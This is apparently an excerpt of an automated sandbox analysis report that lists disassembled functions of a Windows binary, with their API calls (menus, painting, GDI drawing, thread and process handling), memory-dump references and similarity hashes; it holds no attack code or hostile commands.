                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 650687236-0
                                                                                                                              • Opcode ID: be8d2df41d99747e162d95f96d2eaa92046356fce36ceff873d13b6287eb56d5
                                                                                                                              • Instruction ID: ff687545e97ffddff0653fff91621578d9f00124eeec92b76e294605eb7c5463
                                                                                                                              • Opcode Fuzzy Hash: be8d2df41d99747e162d95f96d2eaa92046356fce36ceff873d13b6287eb56d5
                                                                                                                              • Instruction Fuzzy Hash: 72519A71A00215AFCF01EFA8C841AAEB7F5FF58710F11845AE915BB351DB34AE41CB90
                                                                                                                              Function 001B54E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001B552E
                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001B5579
                                                                                                                              • IsMenu.USER32(00000000), ref: 001B5599
                                                                                                                              • CreatePopupMenu.USER32 ref: 001B55CD
                                                                                                                              • GetMenuItemCount.USER32(000000FF), ref: 001B562B
                                                                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 001B565C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3311875123-0
                                                                                                                              • Opcode ID: ee21df454703c2d74d9e010ef101b079242e807b25241a6a880cc832f74b1f6f
                                                                                                                              • Instruction ID: 27a428d63ae72f4ff284d7952009d96134a19ec4830249a481fb55f618e75819
                                                                                                                              • Opcode Fuzzy Hash: ee21df454703c2d74d9e010ef101b079242e807b25241a6a880cc832f74b1f6f
                                                                                                                              • Instruction Fuzzy Hash: 8B51D270A00B49EFDF25CF68D888BEDBBF7AF55318F544119E8159B290E3B09944CB51
                                                                                                                              Function 0018B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 0018B1C1
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0018B225
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 0018B242
                                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0018B253
                                                                                                                              • EndPaint.USER32(?,?), ref: 0018B29D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1827037458-0
                                                                                                                              • Opcode ID: 71c4a3729e3aeead430d435faf171f1d1b6f7d54ac09cd201d9df03d4eccf6f8
                                                                                                                              • Instruction ID: 4a2954e3284480334df7703af64b1447af8d709d8c689f06ff409a2e74b9f309
                                                                                                                              • Opcode Fuzzy Hash: 71c4a3729e3aeead430d435faf171f1d1b6f7d54ac09cd201d9df03d4eccf6f8
                                                                                                                              • Instruction Fuzzy Hash: F141BD70108600AFD711EF25ECC8FBA7BE9EF59720F040669F9A5872A1C730AA45DB61
                                                                                                                              Function 001DE1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ShowWindow.USER32(00231810,00000000,?,?,00231810,00231810,?,001EE2D6), ref: 001DE21B
                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 001DE23F
                                                                                                                              • ShowWindow.USER32(00231810,00000000,?,?,00231810,00231810,?,001EE2D6), ref: 001DE29F
                                                                                                                              • ShowWindow.USER32(?,00000004,?,?,00231810,00231810,?,001EE2D6), ref: 001DE2B1
                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 001DE2D5
                                                                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 001DE2F8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 642888154-0
                                                                                                                              • Opcode ID: 0e62584f3699470596b4ebc35d11e3ad30964c8cbc65fccef542d7913dfb7732
                                                                                                                              • Instruction ID: 5a7a9090704a8e5788b4cf713e55788c41f23d98857726dda746a0d3ca41a945
                                                                                                                              • Opcode Fuzzy Hash: 0e62584f3699470596b4ebc35d11e3ad30964c8cbc65fccef542d7913dfb7732
                                                                                                                              • Instruction Fuzzy Hash: CB416234600141EFDB26DF18D899BA47BF5BF06315F1841BAEA598F7A2C732A841CB91
                                                                                                                              Function 001DE9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0018B5EB
                                                                                                                                • Part of subcall function 0018B58B: SelectObject.GDI32(?,00000000), ref: 0018B5FA
                                                                                                                                • Part of subcall function 0018B58B: BeginPath.GDI32(?), ref: 0018B611
                                                                                                                                • Part of subcall function 0018B58B: SelectObject.GDI32(?,00000000), ref: 0018B63B
                                                                                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 001DE9F2
                                                                                                                              • LineTo.GDI32(00000000,00000003,?), ref: 001DEA06
                                                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 001DEA14
                                                                                                                              • LineTo.GDI32(00000000,00000000,?), ref: 001DEA24
                                                                                                                              • EndPath.GDI32(00000000), ref: 001DEA34
                                                                                                                              • StrokePath.GDI32(00000000), ref: 001DEA44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 43455801-0
                                                                                                                              • Opcode ID: 3ceeaf6b586ec616a3fdea46309e7d9abef3920904fd0a92d5d1c8960fb06c9e
                                                                                                                              • Instruction ID: 7d51259597cd5d342085515c797ea6a3f926d37d401a1571d5c1f719d46d906a
                                                                                                                              • Opcode Fuzzy Hash: 3ceeaf6b586ec616a3fdea46309e7d9abef3920904fd0a92d5d1c8960fb06c9e
                                                                                                                              • Instruction Fuzzy Hash: 1711DB7600014DBFEF129F90EC88EAA7FADEB08355F048052FE195A160D7719D96DBA0
                                                                                                                              Function 001AEF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetDC.USER32(00000000), ref: 001AEFB6
                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 001AEFC7
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001AEFCE
                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 001AEFD6
                                                                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 001AEFED
                                                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 001AEFFF
                                                                                                                                • Part of subcall function 001AA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,001AA79D,00000000,00000000,?,001AAB73), ref: 001AB2CA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 603618608-0
                                                                                                                              • Opcode ID: 73eba63f21d5af82a0fed8294f163816faa6f5f4923ee578f61aadbaeeb37d14
                                                                                                                              • Instruction ID: d175566613535e80163f320e360d341b19afb2bb888cc352903755411095251e
                                                                                                                              • Opcode Fuzzy Hash: 73eba63f21d5af82a0fed8294f163816faa6f5f4923ee578f61aadbaeeb37d14
                                                                                                                              • Instruction Fuzzy Hash: 82014475A00215BFEB109BA59C49B6EBFB9EF49751F004066FE08EB290D6709D01CB61
                                                                                                                              Function 001987D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __init_pointers.LIBCMT ref: 001987D7
                                                                                                                                • Part of subcall function 00191E5A: __initp_misc_winsig.LIBCMT ref: 00191E7E
                                                                                                                                • Part of subcall function 00191E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00198BE1
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00198BF5
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00198C08
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00198C1B
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00198C2E
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00198C41
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00198C54
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00198C67
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00198C7A
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00198C8D
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00198CA0
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00198CB3
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00198CC6
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00198CD9
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00198CEC
                                                                                                                                • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00198CFF
                                                                                                                              • __mtinitlocks.LIBCMT ref: 001987DC
                                                                                                                                • Part of subcall function 00198AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0022AC68,00000FA0,?,?,001987E1,00196AFA,002267D8,00000014), ref: 00198AD1
                                                                                                                              • __mtterm.LIBCMT ref: 001987E5
                                                                                                                                • Part of subcall function 0019884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 001989CF
                                                                                                                                • Part of subcall function 0019884D: _free.LIBCMT ref: 001989D6
                                                                                                                                • Part of subcall function 0019884D: RtlDeleteCriticalSection.NTDLL(0022AC68), ref: 001989F8
                                                                                                                              • __calloc_crt.LIBCMT ref: 0019880A
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00198833
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2942034483-0
                                                                                                                              • Opcode ID: d702b5e1fe53d9e2ab7382b3998160e82a0f7ede598fa1f4876a674649865cde
                                                                                                                              • Instruction ID: 7a56c567857c5525ea3e95dbce86e30ca8bf895b45e6793fd5b9cc7185e86961
                                                                                                                              • Opcode Fuzzy Hash: d702b5e1fe53d9e2ab7382b3998160e82a0f7ede598fa1f4876a674649865cde
                                                                                                                              • Instruction Fuzzy Hash: 50F089331197516AFE787BBCBC0765A3AD49F23B70B650A2EF464D60E2FF1098414175
                                                                                                                              Function 001BA3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1423608774-0
                                                                                                                              • Opcode ID: 6dd520a9d9d124147733cd7f1a142731039da469bfdc0f7c40433259100aeba1
                                                                                                                              • Instruction ID: 184422e8e375276b90a3ec12f5c126d7a2e550545dbb474c4dd2257f53cf9893
                                                                                                                              • Opcode Fuzzy Hash: 6dd520a9d9d124147733cd7f1a142731039da469bfdc0f7c40433259100aeba1
                                                                                                                              • Instruction Fuzzy Hash: 4B01A432101211ABD7152B58FD48EFF7BBAFF89702B800529F603929B1CB74A841CBA1
                                                                                                                              Function 00171867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00171898
                                                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 001718A0
                                                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001718AB
                                                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001718B6
                                                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 001718BE
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001718C6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Virtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4278518827-0
                                                                                                                              • Opcode ID: 45bacdb9b35191932b083b0e3ee788d3bfe1b67b952b604aa83e3fc14b6b5a68
                                                                                                                              • Instruction ID: 563ab3fd99c4921cc70832d8c7486bdfd524cb00172508efdd939197d5980a3f
                                                                                                                              • Opcode Fuzzy Hash: 45bacdb9b35191932b083b0e3ee788d3bfe1b67b952b604aa83e3fc14b6b5a68
                                                                                                                              • Instruction Fuzzy Hash: 880167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C87A42C7F5A864CBE5
                                                                                                                              Function 001B84F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001B8504
                                                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001B851A
                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 001B8529
                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001B8538
                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001B8542
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001B8549
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 839392675-0
                                                                                                                              • Opcode ID: 5673efe9bd0517853f0883e61b5ddc2b4b0363a1b80b8afeba898dd464547b3f
                                                                                                                              • Instruction ID: 49a18a1e78300b66dc79b729bb9e1b10c3a6d3d714f2b1546179bf61649972d3
                                                                                                                              • Opcode Fuzzy Hash: 5673efe9bd0517853f0883e61b5ddc2b4b0363a1b80b8afeba898dd464547b3f
                                                                                                                              • Instruction Fuzzy Hash: B0F05E72240158BBE7215B62AD0EEFF7F7DDFC6B25F000058FA05D1050EBA06A81C6B5
                                                                                                                              Function 001BA31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 001BA330
                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 001BA341
                                                                                                                              • TerminateThread.KERNEL32(?,000001F6,?,?,?,001E66D3,?,?,?,?,?,0017E681), ref: 001BA34E
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,001E66D3,?,?,?,?,?,0017E681), ref: 001BA35B
                                                                                                                                • Part of subcall function 001B9CCE: CloseHandle.KERNEL32(?,?,001BA368,?,?,?,001E66D3,?,?,?,?,?,0017E681), ref: 001B9CD8
                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 001BA36E
                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 001BA375
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3495660284-0
                                                                                                                              • Opcode ID: adb97dc365fc03075d7677faac06657184cfc1474b71f91902180ecdadb4fe8f
                                                                                                                              • Instruction ID: 62d0c98d2a00a73bfe6e06c77151585a104a36b59f70a442339495f8567a71ba
                                                                                                                              • Opcode Fuzzy Hash: adb97dc365fc03075d7677faac06657184cfc1474b71f91902180ecdadb4fe8f
                                                                                                                              • Instruction Fuzzy Hash: 65F05E72141211ABD3112B68FD48EFF7B7AFF89302B400521F203918B1CBB59891CB91
                                                                                                                              Function 0018D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0019010A: std::exception::exception.LIBCMT ref: 0019013E
                                                                                                                                • Part of subcall function 0019010A: __CxxThrowException@8.LIBCMT ref: 00190153
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                                • Part of subcall function 0017BBD9: _memmove.LIBCMT ref: 0017BC33
                                                                                                                              • __swprintf.LIBCMT ref: 0018D98F
                                                                                                                              Strings
                                                                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0018D832
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
